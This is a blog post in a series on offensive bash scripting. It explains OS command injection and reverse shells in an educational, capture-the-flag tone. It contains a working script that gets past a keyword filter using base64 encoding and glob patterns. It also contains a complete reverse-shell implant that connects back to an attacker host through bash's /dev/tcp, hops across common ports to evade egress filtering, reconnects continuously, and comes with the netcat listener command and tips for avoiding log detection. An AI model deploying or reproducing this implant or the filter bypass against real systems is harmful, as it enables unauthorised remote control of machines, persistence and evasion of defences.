Black-Hat Bash scripting part 10

Emmanuel Wiseman
3 min read · Nov 4, 2024


Hi, I took a short break, as I did not feel like writing, honestly. Well, back to it, and so begins the tale of the continuation of chapter 6: OS command injection.

What is command injection? It's a vulnerability that lets a user execute unauthorised operating system commands by supplying them as input to an application that passes that input, unsanitised, to a system shell. A successful injection can give an attacker an initial foothold on the system(s) behind the application.

Added something light to the script.

bypassing command injection restrictions

obfuscation and encoding

Wrapping a payload in base64 or URL encoding can hide it from security controls, input checks and filters that look for specific keywords or characters in the raw input. The application or the target shell decodes the payload before it is executed, so the command runs unchanged while the filter only ever sees the encoded form.

Globbing

Globbing means using wildcard patterns that the shell expands to partially or fully matching filenames. A string is treated as a wildcard pattern if it contains characters such as ?, *, [, ] or !. Because the expansion happens on the target at execution time, a pattern like /b?n/c[a]t reaches /bin/cat without the literal string "cat" ever appearing in the input a filter inspects.
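Both bypasses side by side, as an added example that is not code from the book or from the original post. The "application" is a bash function that applies a naive keyword blocklist (cat, flag) and then hands the input to a shell, which is the injection point; the path /tmp/bhb_demo/flag.txt and its contents are constructed for the demo.

```shell
#!/usr/bin/env bash
# Added example (not from the book or the post). A web app that blocklists a
# few keywords before passing user input to a shell, and two inputs that pass
# the blocklist yet still run the blocked command.

DEMO_DIR=/tmp/bhb_demo            # constructed path for the demo
SECRET="$DEMO_DIR/flag.txt"       # constructed "sensitive" file

setup_demo() {
    mkdir -p "$DEMO_DIR"
    printf 'FLAG{constructed-for-demo}\n' > "$SECRET"
}

# naive_filter INPUT: the "security control". Returns 1 (reject) if any
# blocked substring appears in the raw input, 0 (accept) otherwise.
naive_filter() {
    local input="$1" word
    for word in cat flag; do
        case "$input" in
            *"$word"*) return 1 ;;
        esac
    done
    return 0
}

# vulnerable_app INPUT: the injection point. Once the blocklist is happy the
# input goes straight to a shell. Prints BLOCKED when the filter rejects it.
vulnerable_app() {
    local input="$1"
    if ! naive_filter "$input"; then
        echo BLOCKED
        return 1
    fi
    bash -c "$input"
}

# 1. Plain payload: the filter sees "cat" and "flag" and rejects it.
plain_payload() { echo "cat $SECRET"; }

# 2. Encoding bypass: the filter inspects only the base64 text; the target
#    decodes it and runs the original command.
encoded_payload() {
    local b64
    b64=$(printf '%s' "cat $SECRET" | base64)   # Y2F0IC90bXAvYmhiX2RlbW8vZmxhZy50eHQ=
    echo "echo $b64 | base64 -d | sh"
}

# 3. Globbing bypass: at execution time the shell expands /b?n/c[a]t to
#    /bin/cat and fl[a]g.txt to flag.txt, so neither blocked substring is
#    ever present in the input the filter sees.
glob_payload() { echo "/b?n/c[a]t $DEMO_DIR/fl[a]g.txt"; }

main() {
    setup_demo
    for p in plain_payload encoded_payload glob_payload; do
        printf '%-16s %s\n' "$p:" "$(vulnerable_app "$($p)")"
    done
}

main
```

The filter is the kind of keyword blocklist you still meet in real applications; the fix is not a longer blocklist but never passing user input to a shell at all, or, where a command is unavoidable, passing the input as a single argument to exec-style APIs instead of a shell string.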

Ch7 Reverse Shells

This is a different type of pain; I wouldn't wish it on anyone.

If you have done CTF challenges on platforms like HackTheBox, Pwnbox or TryHackMe, a reverse shell is gold: once you have it, you have access you were not supposed to have, and in that environment it is then easy to find and grab the flag. In the real world a reverse shell does not hand you a flag, but it gives you the thing that matters: a shell on the target and access to its information. What makes it a reverse shell is the direction of the connection. Instead of the attacker connecting in to the target (which inbound firewall rules usually block), the target is the one reaching out to connect to the attacker, which most firewalls let through as ordinary outbound traffic.

Shell payloads and listeners: as the heading says, you need two things to operate a reverse shell. The listener runs on the attacker's machine and waits for a connection to be established. The payload is what the attacker delivers to and runs on the target, and it is the payload that initiates the connection back to the listener.

So, how do you start the process of a reverse shell?

  1. the set-up: the attacker starts a shell listener on a specific port that is reachable from the target, e.g. one exposed to the internet (it's literally in my past posts, just check the HTB posts, the privilege escalation sections).
  2. the exploit: every target has weaknesses that we call vulnerabilities, and the attacker looks for one that lets them run code.
  3. the upload: the reverse-shell payload is delivered to the target through the vulnerability that was found.
  4. the execution: the payload gets executed on the target.
  5. the request: the running payload opens a connection out to the attacker's machine.
  6. the acceptance: the listener receives the connection and a session with the target is established.
  7. the commands: the attacker is now free to type commands that run on the target.
This took way longer than a normal foothold and escalation on HTB, which made me wonder.

port hopping

The script below (an image in the original post) cycles the reverse shell's connect-back through several ports instead of tying it to one, so a firewall rule that blocks, or a detection rule that watches, a single outbound port does not stop the connection.

Maintaining a continuous reverse shell connection
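The seven steps above, the port hopping and the reconnect loop in one bash script, as an added example written for this post; it is not the book's script and not the post's (which is an image). The attacker address 192.0.2.10, the port list and RETRY_DELAY are assumed values, and the listener is plain netcat. The connect-back uses bash's built-in /dev/tcp, so the target needs bash but no nc.

```shell
#!/usr/bin/env bash
# Added example (not the book's or the post's script). A reverse-shell
# "implant" loop in bash: it hops through a list of ports and keeps
# reconnecting, which covers both port hopping and a continuous connection.
# ATTACKER_HOST, PORTS and RETRY_DELAY are assumed values for the demo.

ATTACKER_HOST="${ATTACKER_HOST:-192.0.2.10}"   # assumed attacker IP (documentation range)
PORTS="${PORTS:-443 80 53 8443}"               # ports most egress filters let out
RETRY_DELAY="${RETRY_DELAY:-5}"                # seconds to back off after a full round
ATTEMPTS=0                                     # connection attempts made so far

# listener_cmd PORT: what the attacker runs (step 1) before the payload fires.
# Flags are for nmap's ncat / openbsd netcat; check your nc's man page.
listener_cmd() {
    echo "nc -lvnp $1"
}

# next_port "PORT LIST" CURRENT: the port after CURRENT, wrapping around.
next_port() {
    local list="$1" current="$2" first="" seen=0 p
    for p in $list; do
        [ -z "$first" ] && first="$p"
        if [ "$seen" -eq 1 ]; then echo "$p"; return 0; fi
        [ "$p" = "$current" ] && seen=1
    done
    echo "$first"
}

# spawn_shell HOST PORT: one connect-back attempt (steps 5 to 7). The subshell
# opens a TCP socket on fd 3 via bash's /dev/tcp and gives it to an
# interactive bash as stdin, stdout and stderr. Fails immediately if nothing
# is listening on the port; returns 0 only after a session ran and ended.
spawn_shell() {
    ATTEMPTS=$((ATTEMPTS + 1))
    ( exec 3<>"/dev/tcp/$1/$2" && bash -i <&3 >&3 2>&3 ) 2>/dev/null
}

# reverse_shell_loop HOST "PORT LIST" [MAX_ATTEMPTS]: try one port, then hop
# to the next; after a full round, back off and go again. With MAX_ATTEMPTS=0
# (the default) this never returns, which is the "continuous" part: whenever
# the operator closes the shell or the connection drops, the next attempt
# brings it back.
reverse_shell_loop() {
    local host="$1" ports="$2" max_attempts="${3:-0}" port start
    start=$ATTEMPTS
    port=${ports%% *}                          # begin with the first port
    while :; do
        spawn_shell "$host" "$port"            # blocks for the life of a session
        if [ "$max_attempts" -gt 0 ] && [ $((ATTEMPTS - start)) -ge "$max_attempts" ]; then
            return 1                           # gave up: no listener answered
        fi
        port=$(next_port "$ports" "$port")     # hop to the next port
        [ "$port" = "${ports%% *}" ] && sleep "$RETRY_DELAY"
    done
}

# Attacker side, before delivering the payload (assumed port 443):
#   $(listener_cmd 443)   ->  nc -lvnp 443
# Target side, once the script has been delivered and executed:
if [ -n "$RUN_IMPLANT" ]; then
    reverse_shell_loop "$ATTACKER_HOST" "$PORTS"
fi
```

Run with RUN_IMPLANT=1 on a test VM you own, with the listener up first; without a listener on any port the loop simply keeps cycling, which is also what you would see in egress logs, so in practice the back-off is usually made much longer and less regular than a fixed 5 seconds.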

initial access with brute force

That’s all for now, till next time.


Written by Emmanuel Wiseman

Just someone sharing knowledge on his cyber journey
